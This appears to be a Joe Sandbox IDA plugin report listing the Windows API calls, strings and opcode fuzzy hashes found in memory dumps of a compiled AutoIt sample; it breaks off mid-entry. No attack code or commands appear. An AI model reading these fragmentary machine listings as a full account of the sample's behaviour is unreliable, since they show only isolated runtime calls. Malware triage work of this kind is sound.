                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: e6793358670d36486af94fc7ad7920c63a6a1bc8ee6a37db27bced0547ddb171
                                                                        • Instruction ID: aa4ad731063f9549a4b77baa8733642c7f6ac248240ea50441543078ab6ab72c
                                                                        • Opcode Fuzzy Hash: e6793358670d36486af94fc7ad7920c63a6a1bc8ee6a37db27bced0547ddb171
                                                                        • Instruction Fuzzy Hash: 86F1E3B1509301AFD721CF25CC89BAABBE8FF49356F040A1DF989D62A1C774D848DB91
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,0098DC00), ref: 00956449
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 3964851224-45149045
                                                                        • Opcode ID: c332e02f6dfbb47e19cdda09c7ce80837ec0130a2c2e491e33cb215ddb16250c
                                                                        • Instruction ID: ccfad4dc7d500e3f68e0787e232f85c78af33ebc0625f227012e3c0bbbcbc13c
                                                                        • Opcode Fuzzy Hash: c332e02f6dfbb47e19cdda09c7ce80837ec0130a2c2e491e33cb215ddb16250c
                                                                        • Instruction Fuzzy Hash: D9C18A302043558FCA14EF15C551A7EB7E6AFD9345F40486CF8869B2E2EB25ED4ECB82
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0095D5AE
                                                                        • SetTextColor.GDI32(?,?), ref: 0095D5B2
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0095D5C8
                                                                        • GetSysColor.USER32(0000000F), ref: 0095D5D3
                                                                        • CreateSolidBrush.GDI32(?), ref: 0095D5D8
                                                                        • GetSysColor.USER32(00000011), ref: 0095D5F0
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095D5FE
                                                                        • SelectObject.GDI32(?,00000000), ref: 0095D60F
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0095D618
                                                                        • SelectObject.GDI32(?,?), ref: 0095D625
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0095D644
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095D65B
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0095D670
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095D698
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0095D6BF
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0095D6DD
                                                                        • DrawFocusRect.USER32(?,?), ref: 0095D6E8
                                                                        • GetSysColor.USER32(00000011), ref: 0095D6F6
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0095D6FE
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0095D712
                                                                        • SelectObject.GDI32(?,0095D2A5), ref: 0095D729
                                                                        • DeleteObject.GDI32(?), ref: 0095D734
                                                                        • SelectObject.GDI32(?,?), ref: 0095D73A
                                                                        • DeleteObject.GDI32(?), ref: 0095D73F
                                                                        • SetTextColor.GDI32(?,?), ref: 0095D745
                                                                        • SetBkColor.GDI32(?,?), ref: 0095D74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 812f6dd2a65a162357bcb9b48f0ed987f292e1cfd1eb90db4f750b0de0873ad6
                                                                        • Instruction ID: 10f292a1f3e9a8cd7512480b1c1d4c9ceecc3cf492d87292f2b79d2adc2fbd20
                                                                        • Opcode Fuzzy Hash: 812f6dd2a65a162357bcb9b48f0ed987f292e1cfd1eb90db4f750b0de0873ad6
                                                                        • Instruction Fuzzy Hash: 28516C72906208AFDF10DFA4DC48EAE7B79EF08320F104511F919AB2A0D7719A81DF90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0095B7B0
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0095B7C1
                                                                        • CharNextW.USER32(0000014E), ref: 0095B7F0
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0095B831
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0095B847
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0095B858
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0095B875
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0095B8C7
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0095B8DD
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0095B90E
                                                                        • _memset.LIBCMT ref: 0095B933
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0095B97C
                                                                        • _memset.LIBCMT ref: 0095B9DB
                                                                        • SendMessageW.USER32 ref: 0095BA05
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0095BA5D
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0095BB0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0095BB2C
                                                                        • GetMenuItemInfoW.USER32(?), ref: 0095BB76
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0095BBA3
                                                                        • DrawMenuBar.USER32(?), ref: 0095BBB2
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0095BBDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 25ff9e877722f253506409bf7ad0a6285d190e33d531c75a3d4c53747c43e687
                                                                        • Instruction ID: 251d15595195498f89f1cd54dad37deabd7594ca9ec9af89c5d3b24a0e781934
                                                                        • Opcode Fuzzy Hash: 25ff9e877722f253506409bf7ad0a6285d190e33d531c75a3d4c53747c43e687
                                                                        • Instruction Fuzzy Hash: 5DE18D71900208AFDF20DF66CC84AEE7BB8EF45725F108156FE19AA190D7748A89DF60
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0095778A
                                                                        • GetDesktopWindow.USER32 ref: 0095779F
                                                                        • GetWindowRect.USER32(00000000), ref: 009577A6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00957808
                                                                        • DestroyWindow.USER32(?), ref: 00957834
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0095785D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095787B
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009578A1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 009578B6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009578C9
                                                                        • IsWindowVisible.USER32(?), ref: 009578E9
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00957904
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00957918
                                                                        • GetWindowRect.USER32(?,?), ref: 00957930
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00957956
                                                                        • GetMonitorInfoW.USER32 ref: 00957970
                                                                        • CopyRect.USER32(?,?), ref: 00957987
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 009579F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: faf88301123f3a88b763528eb7329602ee1e3811eeb3190974ab00e46cf7e21b
                                                                        • Instruction ID: 30772634d4332592392dd503215a8181c264becfd59d0d9d49ff572308b672f7
                                                                        • Opcode Fuzzy Hash: faf88301123f3a88b763528eb7329602ee1e3811eeb3190974ab00e46cf7e21b
                                                                        • Instruction Fuzzy Hash: 5CB1A271618301AFDB04DFA5D888B6AFBE5FF88311F00891DF9999B291D770E944CB92
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00936CFB
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00936D21
                                                                        • _wcscpy.LIBCMT ref: 00936D4F
                                                                        • _wcscmp.LIBCMT ref: 00936D5A
                                                                        • _wcscat.LIBCMT ref: 00936D70
                                                                        • _wcsstr.LIBCMT ref: 00936D7B
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00936D97
                                                                        • _wcscat.LIBCMT ref: 00936DE0
                                                                        • _wcscat.LIBCMT ref: 00936DE7
                                                                        • _wcsncpy.LIBCMT ref: 00936E12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: 3b1b9b99d5b69334c51d4bab3945f53606341b1e69f0ab111e9bf4974be22eb2
                                                                        • Instruction ID: d93b718b3b51a4db04f8d5dc132d63ddb9e5f1882835771a450a3a2b4828c504
                                                                        • Opcode Fuzzy Hash: 3b1b9b99d5b69334c51d4bab3945f53606341b1e69f0ab111e9bf4974be22eb2
                                                                        • Instruction Fuzzy Hash: 7241B172604208BBEB10AB64CC47FBF77BCEF81714F144025F905A61C2EBB59A519AA1
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0090A939
                                                                        • GetSystemMetrics.USER32(00000007), ref: 0090A941
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0090A96C
                                                                        • GetSystemMetrics.USER32(00000008), ref: 0090A974
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0090A999
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0090A9B6
                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0090A9C6
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0090A9F9
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0090AA0D
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0090AA2B
                                                                        • GetStockObject.GDI32(00000011), ref: 0090AA47
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0090AA52
                                                                          • Part of subcall function 0090B63C: GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                          • Part of subcall function 0090B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        • SetTimer.USER32(00000000,00000000,00000028,0090AB87), ref: 0090AA79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: ecb058facc55360391076c44a4c525a5542e5f9eeaef5d4f91803805af93f300
                                                                        • Instruction ID: d1ed6ee7bebf9ad687496cef2c4b0e2429ee6d72ddca47b2b177b1d9c78cb4dc
                                                                        • Opcode Fuzzy Hash: ecb058facc55360391076c44a4c525a5542e5f9eeaef5d4f91803805af93f300
                                                                        • Instruction Fuzzy Hash: 4DB18A71A1520ADFDB14DFA8CD45BAE7BB9FF48324F104229FA15A62D0DB34E840DB91
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 62970417-1919597938
                                                                        • Opcode ID: 774f90a157cd602e23ce9e924f47b74d2d28d4090049f96bdb5a309d6e1db5e2
                                                                        • Instruction ID: 36521ef20c01c82e15976e51f1e0f5b351ecd7ae31681e81fdeaab8c6efd43ca
                                                                        • Opcode Fuzzy Hash: 774f90a157cd602e23ce9e924f47b74d2d28d4090049f96bdb5a309d6e1db5e2
                                                                        • Instruction Fuzzy Hash: 15D1E730108746AFCB18EF24C441AAABBB4FF55344F104E1DF596976A1DB30E99ACBD2
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00953735
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0098DC00,00000000,?,00000000,?,?), ref: 009537A3
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009537EB
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00953874
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00953B94
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00953BA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 9f33295c967f30a0339044193a4f379df3006ec34cca0e6c95167d811553f4aa
                                                                        • Instruction ID: 891ab104441046d8736b7f9189bc9d0a88bfa629553869d2ac22cd6cbf297a03
                                                                        • Opcode Fuzzy Hash: 9f33295c967f30a0339044193a4f379df3006ec34cca0e6c95167d811553f4aa
                                                                        • Instruction Fuzzy Hash: AD026A752046059FCB14EF29C855E2AB7E9FF88720F04855CF98A9B3A1DB30ED45CB82
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00956C56
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00956D16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 4ac2c7ca17e32a4b251b47bee36ff6708a36f181e204113fdb15eb6b1e01a6db
                                                                        • Instruction ID: b1a1698d9cdadda2c96968db48d83ddd3c454cc1c39ad54693910b89d07a60fd
                                                                        • Opcode Fuzzy Hash: 4ac2c7ca17e32a4b251b47bee36ff6708a36f181e204113fdb15eb6b1e01a6db
                                                                        • Instruction Fuzzy Hash: E6A149302043559FCB14EF25C852A7AB3A6FF84315F504D6DB9969B2D2DB31EC19CB82
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092CF91
                                                                        • __swprintf.LIBCMT ref: 0092D032
                                                                        • _wcscmp.LIBCMT ref: 0092D045
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0092D09A
                                                                        • _wcscmp.LIBCMT ref: 0092D0D6
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0092D10D
                                                                        • GetDlgCtrlID.USER32(?), ref: 0092D15F
                                                                        • GetWindowRect.USER32(?,?), ref: 0092D195
                                                                        • GetParent.USER32(?), ref: 0092D1B3
                                                                        • ScreenToClient.USER32(00000000), ref: 0092D1BA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092D234
                                                                        • _wcscmp.LIBCMT ref: 0092D248
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0092D26E
                                                                        • _wcscmp.LIBCMT ref: 0092D282
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                        • String ID: %s%u
                                                                        • API String ID: 3119225716-679674701
                                                                        • Opcode ID: db58d7cf331084133f4b2249dd91ab7f41e1b8f414e2f8fe4f72509be025f2ca
                                                                        • Instruction ID: 660e1cdcaaa0481be5448c64604f9b54cfd830df2ed5953c9cc1b98772026e0a
                                                                        • Opcode Fuzzy Hash: db58d7cf331084133f4b2249dd91ab7f41e1b8f414e2f8fe4f72509be025f2ca
                                                                        • Instruction Fuzzy Hash: F5A1F071209316EFD708DF64E884BEAB7ACFF44310F008519FAA9D2195DB30EA55CB91
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0092D8EB
                                                                        • _wcscmp.LIBCMT ref: 0092D8FC
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0092D924
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0092D941
                                                                        • _wcscmp.LIBCMT ref: 0092D95F
                                                                        • _wcsstr.LIBCMT ref: 0092D970
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0092D9A8
                                                                        • _wcscmp.LIBCMT ref: 0092D9B8
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0092D9DF
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0092DA28
                                                                        • _wcscmp.LIBCMT ref: 0092DA38
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0092DA60
                                                                        • GetWindowRect.USER32(00000004,?), ref: 0092DAC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: b085b6b4bc2c31a59b62fdbf7fec42d5fd7886544ea20c4eeed5c80a899b51ba
                                                                        • Instruction ID: f184f3e565db3f0e08c1e2ca4c0aaed17108311c5a609b24e8658c5685f0af37
                                                                        • Opcode Fuzzy Hash: b085b6b4bc2c31a59b62fdbf7fec42d5fd7886544ea20c4eeed5c80a899b51ba
                                                                        • Instruction Fuzzy Hash: 2681C33110A3199BDB01DF14E985FAA7BECFF84314F044469FD899A09ADB30DD85CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 1cabb711630f031d45f0a756bdca93b30cb6b881bcb86d4d060fcac1f5a4faac
